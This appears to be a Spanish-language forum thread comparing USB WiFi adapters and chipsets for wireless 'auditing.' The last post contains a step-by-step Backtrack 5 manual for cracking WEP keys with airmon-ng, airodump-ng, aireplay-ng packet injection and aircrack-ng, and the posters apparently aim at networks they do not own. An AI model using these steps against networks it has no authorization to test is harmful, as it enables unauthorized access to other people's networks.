Jump to content
  • 0

Mejor Antena para Auditar?


Foxslink7

Question

Estimados,
Estoy buscando la mejor antena para realizar auditorías y hasta ahora he encontrado las siguientes:
Opcion 1:http://www.prowireless.cl/ml_shop/mod/devices/usb_rtl2/01_producto_2w_rtl.gif
2000mw Usb Wifi + Antena 5dbi - Wifislax Backtrack Beini Mac - $ 15.990 en MercadoLibre

Opcion 2 :http://www.prowireless.cl/ml_shop/mod/devices/usb_ra2/01_producto_2w_ra.gif
2000mw Usb Wifi N + Antena 5dbi Wifislax Backtrack Beini Mac - $ 15.990 en MercadoLibre

La Ralink tiene más Mb de Transferencia por Segundo,154 mbps, en cambio la Realtek tiene 3 veces menos y no soporta la banda N.
Segun me informaron Realtek es el mejor chipset pero en este caso especifico creo q conviene más la otra.

Hay otra tarjeta q recomiendan mucho para Auditoria, una TPLINK que vende PCfucktory
https://www.pcfactory.cl/producto/10793-Adaptador.USB.Wireless-TL-WN7200ND
Tiene el mismo chipset Ralink de arriba, el 3070L, que por lo q he leido sirve para auditar. pero aun asi queda por detras en terminos de señal. Me gustaría saber que opinan al respecto

Link to comment
Compartir en otros sitios

3 Respuestas a esta pregunta

Recommended Posts

  • 0

El tema principal es el alcance que tiene la antena y que sea compatible con wifiway o wifislax

 

yo lo hice con wifiway y una tarjeta atheros integrada al notebook pero tuve q buscar la version q traia los drives para mi tarjeta instalados ya q nunca lo pude hacer por mi cuenta

 

las unicas que consegui son claves wep las que colocan por default muchas compañias por temas de compatibilidad

ya que para las demas (que son mas sofisticadas) necesitas librerias de palabras algo asi y es mucho mas tedioso y se puede demorar mucho tiempo

 

saludos

Link to comment
Compartir en otros sitios

  • 0

Yo tengo la última que posteaste y el alcance y señal es más que bueno, por darte un ejemplo me he conectado a una red que esta a casi una cuadra de distancia marcandome señal buena y sin caidas, el único pero, es que en el caso de que uses Beini la ultima versión no te sirve y debes bajar una de las antiguas la cual no recuerdo cual es  :unsure: 
Lamentablemente como no he probado las otras que publicaste no podría darte una opinión basada en la comparación, y solo puedo darte la basada en mi experiencia, la cual ha sido bastante buena.
Saludos!!

Link to comment
Compartir en otros sitios

  • 0

El tema principal es el alcance que tiene la antena y que sea compatible con wifiway o wifislax

yo lo hice con wifiway y una tarjeta atheros integrada al notebook pero tuve q buscar la version q traia los drives para mi tarjeta instalados ya q nunca lo pude hacer por mi cuenta

las unicas que consegui son claves wep las que colocan por default muchas compañias por temas de compatibilidad

ya que para las demas (que son mas sofisticadas) necesitas librerias de palabras algo asi y es mucho mas tedioso y se puede demorar mucho tiempo

saludos

Se llaman diccionarios. Y es un método de fuerza bruta que si en tu diccionario no esta incluida la contraseña del WiFi en cuestión jamas podrás pasar :(

bsod pal que lee :zippy

Link to comment
Compartir en otros sitios

  • 0

Primero que nada les agradezco su pronta respuesta. Al final  compré la Realtek envez de la Ralink, me costó decidirme pero opté por el chipset más conocido y antiguo del mercado,  espero que sirva tanto como el otro.  Respecto a lo de la tasa de transferencia el vendedor me explicó lo sgte:
 

“Mira la diferencia real entre las 2 es solo la transferencia, pero si te vas a conectar a otras señales te comento que prácticamente no vas a notar la diferencia. Muchas veces he probado con la Ralink y me navega igual a 54mbps, eso es porque las compañías todavía instalan wifi a 54mbps y son pocos los usuarios que compran un router nuevo con standard.

Sobre las claves Realtek 8187L es un chip que lleva bastante más tiempo en el mercado que los Ralink 3070 por lo tanto están más trabajados y finis para el tema de auditoría, así con Realtek puedes sacar desde una WEP a una WPA2, en cambio con el Ralink solo te va a sacar WEP.”

Así que ambas son buenas, solo que una saca más claves pero tiene menor velocidad,  es raro que valgan lo mismo. Instale ayer el adaptador y por el momento va todo bien,  una característica interesante es que tiene 2 conectores USB  y así  aumentaría la intensidad de la señal. Viene con un CD que tiene un programa de booteo XIAOPAN pero todavía no lo he probado. Los único programas que he probado antes  para sacar claves son el BEINI , que es muy lento, y obviamente el Backtrack 5 que funciona más rápido.  Tengo un manual del BT5 que  hice cuando sacaba WEPs con un notebook, pero creo q tengo un error en la parte donde aumentas la inyección de paquetes, lo voy a poner aquí para ver que opinan o si encuentan algo mal. Aquí va el manual:

- startx  (para entrar al escritorio de Backtrack)

 

Comandos a seguir:

Abrir ventana:

- airmon-ng

- airmon-ng start wlan0    ( active el mon0)

- airmon-ng    (comprueba que el monitor está activado. por ej: mon0)

 

Para iniciar Escaneo de redes:

- airodump-ng mon0 (en modo monitor)

Ctrl+c  ( para detener escaneo)

- airodump-ng -w clave -c ... --bssid ... mon0 

 

 

(w- determina donde se guardan los carpetas capturadas , en este caso clave.

c-identifica el canal de la red que vamos a hackear [CH].

bssid ... aqui copiamos y pegamos el BSSID de la red que vamos a crackear)

 

Pasos para apurar el proceso mediante autentificación:

Abrir otra ventana:

- aireplay-ng -1 0 -a (direccion mac) mon0

- aireplay-ng -3 -b (direcion bssid) mon0

Cuando #Data pase los 30.000 pausar con ctrl-c

Detener el envió y después la captura de paquetes

 

Para leer clave

Abrir ventana

Método 1:

- dir

- copy clave.cap

- aircrack-ng paste

 

Método 2:

-dir

-aircrack-ng clave-01.cap

 

Clave es lo que dice despues ASCII!!

Link to comment
Compartir en otros sitios

Registrate o inicia sesión para comentar

Tienes que ser un usuario de nuestro foro para poder comentar

Crear una cuenta

Registrate en nuestro foro. Es Fácil!

¡Quiero registrarme ahora!

Iniciar Sesión

¿Ya tienes una cuenta? Inicia sesión aquí

Iniciar Sesión Ahora
×
×
  • Create New...

Información Importante

Al usar nuestro sitio, aceptas a nuestros Términos de Uso y Reglas y Política de Privacidad.

HN Datacenter en Chile